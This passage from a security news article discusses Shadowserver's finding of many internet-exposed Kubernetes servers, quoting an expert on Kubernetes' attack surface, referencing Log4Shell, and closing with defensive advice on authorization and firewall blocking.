In fact, Erfan Shadabi, cybersecurity expert with data-security firm comforte AG, said in an email to Threatpost that he was not surprised that the Shadowserver scan turned up so many Kubernetes servers exposed to the public internet.

“White [Kubernetes] provides massive benefits to enterprises for agile app delivery, there are a few characteristics that make it an ideal attack target for exploitation,” he said. “For instance, as a result of having many containers, Kubernetes has a large attack surface that could be exploited if not pre-emptively secured.”

Open-Source Security Exposed

The findings also raise the perennial issue of how to build security into open-source systems that become ubiquitous as part of modern internet and cloud-based infrastructure, making an attack on them an attack on the myriad systems to which they are connected.

This issue was highlighted all-too-unfortunately in the case of the Log4Shell vulnerability in the ubiquitous Java logging library Apache Log4j that was discovered last December.

The flaw, which is easily exploitable and can allow unauthenticated remote code execution (RCE) and complete server takeover, continues to be targeted by attackers. In fact, a recent report found millions of Java applications still vulnerable, despite a patch being available for Log4Shell.

A particular Achilles’ heel of Kubernetes is that the data-security capabilities built into the platform are only a “bare minimum,” protecting data at rest and data in motion, Shadabi said. In a cloud environment, this is a dangerous prospect.

“There’s no persistent protection of data itself, for example using industry accepted techniques like field-level tokenization,” he observed. “So if an ecosystem is compromised, it’s only a matter of time before the sensitive data being processed by it succumbs to a more insidious attack.”

Shadabi advised organizations that use containers and Kubernetes in their production environments to take securing Kubernetes as seriously as they do all other aspects of their IT infrastructure.

For its part, Shadowserver recommended that if administrators find that a Kubernetes instance in their environment is accessible to the internet, they should consider implementing authorization for access or blocking it at the firewall level to reduce the exposed attack surface.